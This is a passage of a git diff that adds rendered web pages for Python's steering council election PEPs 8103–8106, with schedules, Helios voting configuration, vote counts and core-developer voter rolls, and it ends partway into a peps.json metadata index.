+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+Christian Tismer
+Davin Potts
+Dino Viehland
+Donald Stufft
+Dong-hee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Fred Drake
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hynek Schlawack
+Inada Naoki
+Ivan Levkivskyi
+Jack Jansen
+Jason R. Coombs
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Kurt B. Kaiser
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Lisa Roach
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Hammond
+Mark Shannon
+Matthias Klose
+Michael Foord
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+R. David Murray
+Raymond Hettinger
+Robert Collins
+Ronald Oussoren
+Sandro Tosi
+Senthil Kumaran
+Serhiy Storchaka
+Stefan Behnel
+Steve Dower
+Steven D'Aprano
+Stéphane Wirtel
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Walter Dörwald
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8102.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
diff --git a/pep-8103/index.html b/pep-8103/index.html
new file mode 100644
index 00000000000..ffac169ea3a
--- /dev/null
+++ b/pep-8103/index.html
+
+


+ + +
+
+
+

PEP 8103 – 2022 Term Steering Council election

+
+
Author:
+
Ewa Jodlowska <ewa at python.org>, Ee Durbin <ee at python.org>, Joe Carey <joe at python.org>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
04-Oct-2021
+
+
+
+
+
+

Abstract

+

This document describes the schedule and other details of the December +2021 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2022 term +(i.e. Python 3.11).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin +and Accounting Manager, Joe Carey, to coadminister the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 1, 2021 through November 16, 2021 12:00 UTC (The end of November 15, 2021 Anywhere on Earth). It was announced on python-committers and took place on discuss.python.org.

+

The voting period is: December 1, 2021 12:00 UTC through December 16, 2021 +12:00 UTC (The end of December 15, 2021 Anywhere on Earth).

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters [1].

+

Ballots will be distributed based on the Python Voter Roll for this election [1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name will be made available when the roll is +created.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2022-python-steering-council

+

Name: 2022 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2022 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 1, 2021 00:00 UTC

+

Voting ends at: December 16, 2021 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 85 eligible voters, 67 cast ballots.

+

The top five vote-getters are:

+
    +
  • Pablo Galindo Salgado
  • +
  • Petr Viktorin
  • +
  • Thomas Wouters
  • +
  • Gregory P. Smith
  • +
  • Brett Cannon
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

Candidate             | Votes Received
----------------------|---------------
Pablo Galindo Salgado | 61
Petr Viktorin         | 48
Thomas Wouters        | 48
Gregory P. Smith      | 44
Brett Cannon          | 42
Barry Warsaw          | 39
Victor Stinner        | 35
Mariatta              | 34
Dong-hee Na           | 26
David Mertz           | 24
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Abhilash Raj
+Alex Gaynor
+Ammar Askar
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+Dino Viehland
+Dong-hee Na
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Facundo Batista
+Fred Drake
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jason R. Coombs
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Lisa Roach
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+Raymond Hettinger
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Stefan Behnel
+Stéphane Wirtel
+Steve Dower
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8103.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
diff --git a/pep-8104/index.html b/pep-8104/index.html
new file mode 100644
index 00000000000..3356370f73f
--- /dev/null
+++ b/pep-8104/index.html
+
+


+ + +
+
+
+

PEP 8104 – 2023 Term Steering Council election

+
+
Author:
+
Ee Durbin <ee at python.org>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
08-Nov-2022
+
+
+
+
+
+

Abstract

+

This document describes the schedule and other details of the December +2022 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2023 term +(i.e. Python 3.12).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to administer the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 14, 2022 through November 28, 2022 AoE [2].

+

The voting period was: December 1, 2022 through December 14, 2022 AoE [2].

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters +[1].

+

Ballots will be distributed based on the Python Voter Roll [1] for this election.

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name will be made available when the roll is +created.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2023-python-steering-council

+

Name: 2023 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2023 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 1, 2022 12:00 UTC

+

Voting ends at: December 15, 2022 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 85 eligible voters, 66 cast ballots.

+

The top five vote-getters are:

+
    +
  • Pablo Galindo Salgado
  • +
  • Gregory P. Smith
  • +
  • Emily Morehouse
  • +
  • Brett Cannon
  • +
  • Thomas Wouters
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Candidate               Votes Received
Pablo Galindo Salgado   61
Gregory P. Smith        48
Emily Morehouse         47
Brett Cannon            42
Thomas Wouters          39
Petr Viktorin           36
Victor Stinner          34
Dong-hee Na             29
+
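The question format above is standard approval voting: each voter may approve any number of candidates, each approval counts as one vote, and the five candidates with the most approvals take the five council seats. A minimal sketch of such a tally, using invented example ballots (real Helios ballots are encrypted and never published):

    from collections import Counter

    # Hypothetical ballots, invented for illustration only. Each ballot is
    # the set of candidates that voter approved -- any number of them.
    ballots = [
        {"Pablo Galindo Salgado", "Brett Cannon", "Thomas Wouters"},
        {"Pablo Galindo Salgado", "Gregory P. Smith", "Emily Morehouse"},
        {"Gregory P. Smith", "Emily Morehouse"},
    ]

    # Every approval counts as one vote ("absolute" result type), so the
    # tally is a plain per-candidate sum of approvals.
    tally = Counter()
    for approvals in ballots:
        tally.update(approvals)

    # The five candidates with the most approvals win the five seats.
    winners = [name for name, _votes in tally.most_common(5)]
    print(winners)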
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Alex Gaynor
+Alex Waygood
+Ammar Askar
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+Dennis Sweeney
+Dino Viehland
+Dong-hee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Erlend Egeberg Aasland
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Filipe Laíns
+Fred Drake
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hugo van Kemenade
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jason R. Coombs
+Jelle Zijlstra
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kumar Aditya
+Kurt B. Kaiser
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+R. David Murray
+Raymond Hettinger
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Stefan Behnel
+Stéphane Wirtel
+Steve Dower
+Steven D'Aprano
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8104.rst

+

Last modified: 2024-06-01 20:32:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8105/index.html b/pep-8105/index.html new file mode 100644 index 00000000000..6ffec51fc53 --- /dev/null +++ b/pep-8105/index.html @@ -0,0 +1,527 @@ + + + + + + + + PEP 8105 – 2024 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8105 – 2024 Term Steering Council election

+
+
Author:
+
Ee Durbin <ee at python.org>
+
Sponsor:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
23-Oct-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the +2023 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2024 term +(i.e. Python 3.13).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to administer the election.

+
+
+

Schedule

+

There was a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 9, 2023 through November 22, 2023 AoE [2].

+

The voting period was: November 27, 2023 through December 11, 2023 AoE [2].

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order by first name):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters +[1].

+

Ballots were distributed based on the Python Voter Roll [1] +for this election.

+

While this file is not public as it contains private email addresses, +the Complete Voter Roll is available with a list of all eligible voters by name.

+
+
+

Election Implementation

+

The election was conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2024-python-steering-council

+

Name: 2024 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is the steering council election for the 2024 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: November 27, 2023 12:00 UTC

+

Voting ends at: December 11, 2023 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public; only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Extended Election Implementation

+

Due to a mismatch between the announced timeline and the initial election implementation, +an extended election was held to provide an additional day for voters who were disenfranchised +by the initial election.

+

Results from the initial election were combined with the results from the extended election. +Only voters who DID NOT cast ballots in the initial election were able to vote.

+

The election was conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2024-python-steering-council-extension

+

Name: 2024 Python Steering Council Election Extension

+

Description: Election for the Python steering council, as specified in PEP 13. This is the steering council election for the 2024 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 11, 2023 12:00 UTC

+

Voting ends at: December 12, 2023 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public; only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 87 eligible voters, 68 cast ballots.

+

The top five vote-getters are:

+
    +
  • Pablo Galindo Salgado
  • +
  • Gregory P. Smith
  • +
  • Barry Warsaw
  • +
  • Emily Morehouse
  • +
  • Thomas Wouters
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+

Initial Election

+

56 of 87 eligible voters cast ballots.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Candidate               Votes Received
Barry Warsaw            35
Donghee Na              27
Emily Morehouse         38
Gregory P. Smith        42
Mariatta                25
Pablo Galindo Salgado   48
Thomas Wouters          30
Victor Stinner          27
+

Election Extension

+

12 of the 31 eligible voters who were disenfranchised in the initial election cast ballots.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Candidate               Votes Received
Barry Warsaw            8
Donghee Na              5
Emily Morehouse         8
Gregory P. Smith        10
Mariatta                5
Pablo Galindo Salgado   12
Thomas Wouters          10
Victor Stinner          8
+

Combined

+

68 of 87 eligible voters cast ballots.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Candidate               Votes Received
Barry Warsaw            43
Donghee Na              32
Emily Morehouse         46
Gregory P. Smith        52
Mariatta                30
Pablo Galindo Salgado   60
Thomas Wouters          40
Victor Stinner          35
+
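Because only voters who had not cast a ballot in the initial election could vote in the extension, the two tallies are disjoint and combining them is a straightforward per-candidate sum. A short sketch that reproduces the Combined table from the two tables above:

    from collections import Counter

    # Per-candidate approval counts from the two rounds, as tabulated above.
    initial = Counter({
        "Barry Warsaw": 35, "Donghee Na": 27, "Emily Morehouse": 38,
        "Gregory P. Smith": 42, "Mariatta": 25,
        "Pablo Galindo Salgado": 48, "Thomas Wouters": 30,
        "Victor Stinner": 27,
    })
    extension = Counter({
        "Barry Warsaw": 8, "Donghee Na": 5, "Emily Morehouse": 8,
        "Gregory P. Smith": 10, "Mariatta": 5,
        "Pablo Galindo Salgado": 12, "Thomas Wouters": 10,
        "Victor Stinner": 8,
    })

    # Counter addition sums the disjoint tallies, reproducing the Combined
    # table (e.g. Pablo Galindo Salgado: 48 + 12 == 60).
    combined = initial + extension
    for name, votes in combined.most_common(5):
        print(name, votes)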
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Adam Turner
+Alex Gaynor
+Alex Waygood
+Alexander Belopolsky
+Alyssa Coghlan
+Ammar Askar
+Andrew Svetlov
+Antoine Pitrou
+Barney Gale
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+C.A.M. Gerlach
+Carl Friedrich Bolz-Tereick
+Carl Meyer
+Carol Willing
+Cheryl Sabella
+Chris Withers
+Christian Heimes
+Dennis Sweeney
+Dino Viehland
+Donghee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Erlend Egeberg Aasland
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Filipe Laíns
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hugo van Kemenade
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jason R. Coombs
+Jelle Zijlstra
+Jeremy Kloth
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kumar Aditya
+Kurt B. Kaiser
+Kushal Das
+Larry Hastings
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+Pradyun Gedam
+R. David Murray
+Raymond Hettinger
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Shantanu Jain
+Stefan Behnel
+Stéphane Wirtel
+Steve Dower
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8105.rst

+

Last modified: 2024-06-01 20:32:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8106/index.html b/pep-8106/index.html new file mode 100644 index 00000000000..6273a8a9296 --- /dev/null +++ b/pep-8106/index.html @@ -0,0 +1,414 @@ + + + + + + + + PEP 8106 – 2025 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8106 – 2025 Term Steering Council election

+
+
Author:
+
Ee Durbin <ee at python.org>
+
Sponsor:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
21-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the +2024 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2025 term +(i.e. Python 3.14).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to administer the election.

+
+
+

Schedule

+

There was a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 7, 2024 through November 21, 2024 AoE [2].

+

The voting period was: November 25, 2024 through December 9, 2024 AoE [2].

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order by first name):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters +[1].

+

Ballots were distributed based on the Python Voter Roll [1] +for this election.

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll is available with a list of all eligible voters by name.

+
+
+

Election Implementation

+

The election was conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2025-python-steering-council

+

Name: 2025 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is the steering council election for the 2025 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: November 25, 2024 12:00 UTC

+

Voting ends at: December 10, 2024 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public; only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 100 eligible voters, 76 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Donghee Na
  • +
  • Emily Morehouse
  • +
  • Gregory P. Smith
  • +
  • Pablo Galindo Salgado
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Candidate               Votes Received
Barry Warsaw            58
Donghee Na              48
Emily Morehouse         52
Ethan Furman            31
Gregory P. Smith        50
Mariatta                23
Pablo Galindo Salgado   63
Thomas Wouters          38
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Adam Turner
+Alex Gaynor
+Alex Waygood
+Alexander Belopolsky
+Alyssa Coghlan
+Ammar Askar
+Andrew Svetlov
+Antoine Pitrou
+Barney Gale
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+C.A.M. Gerlach
+CF Bolz-Tereick
+Carl Meyer
+Carol Willing
+Cheryl Sabella
+Chris Withers
+Christian Heimes
+Dennis Sweeney
+Dino Viehland
+Donghee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Erlend Egeberg Aasland
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Filipe Laíns
+Fred Drake
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hugo van Kemenade
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jack Jansen
+Jason R. Coombs
+Jelle Zijlstra
+Jeremy Hylton
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kirill Podoprigora
+Kumar Aditya
+Kurt B. Kaiser
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Shannon
+Matt Page
+Michael Droettboom
+Nathaniel J. Smith
+Ned Batchelder
+Ned Deily
+Neil Schemenauer
+Nikita Sobolev
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+Pradyun Gedam
+R. David Murray
+Raymond Hettinger
+Ronald Oussoren
+Russell Keith-Magee
+Sam Gross
+Savannah Ostrowski
+Senthil Kumaran
+Serhiy Storchaka
+Shantanu Jain
+Stefan Behnel
+Steve Dower
+Stéphane Wirtel
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tian Gao
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8106.rst

+

Last modified: 2024-12-10 12:30:28 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/peps.json b/peps.json new file mode 100644 index 00000000000..c7ca20cfcf1 --- /dev/null +++ b/peps.json @@ -0,0 +1,11375 @@ +{ + "1": { + "number": 1, + "title": "PEP Purpose and Guidelines", + "authors": "Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "13-Jun-2000", + "python_version": null, + "post_history": "21-Mar-2001, 29-Jul-2002, 03-May-2003, 05-May-2012, 07-Apr-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0001/" + }, + "2": { + "number": 2, + "title": "Procedure for Adding New Modules", + "authors": "Brett Cannon, Martijn Faassen", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2001", + "python_version": null, + "post_history": "07-Jul-2001, 09-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0002/" + }, + "3": { + "number": 3, + "title": "Guidelines for Handling Bug Reports", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "25-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0003/" + }, + "4": { + "number": 4, + "title": "Deprecation of Standard Modules", + "authors": "Brett Cannon, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0004/" + }, + "5": { + "number": 5, + "title": "Guidelines for Language Evolution", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "26-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0005/" + }, + "6": { + "number": 6, + "title": "Bug Fix Releases", + "authors": "Aahz, Anthony Baxter", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "15-Mar-2001", + "python_version": null, + "post_history": "15-Mar-2001, 18-Apr-2001, 19-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0006/" + }, + "7": { + "number": 7, + "title": "Style Guide for C Code", + "authors": "Guido van Rossum, Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0007/" + }, + "8": { + "number": 8, + "title": "Style Guide for Python Code", + "authors": "Guido van Rossum, Barry Warsaw, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": "05-Jul-2001, 01-Aug-2013", + "resolution": null, + "requires": null, + "replaces": 
null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0008/" + }, + "9": { + "number": 9, + "title": "Sample Plaintext PEP Template", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "14-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2YMHVPRDWGQLA5A2FKXE2JMLM2HQEEGW/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0009/" + }, + "10": { + "number": 10, + "title": "Voting Guidelines", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Mar-2002", + "python_version": null, + "post_history": "07-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0010/" + }, + "11": { + "number": 11, + "title": "CPython platform support", + "authors": "Martin von L\u00f6wis, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2002", + "python_version": null, + "post_history": "`18-Aug-2007 `__, `14-May-2014 `__, `20-Feb-2015 `__, `10-Mar-2022 `__,", + "resolution": null, + "requires": null, + "replaces": 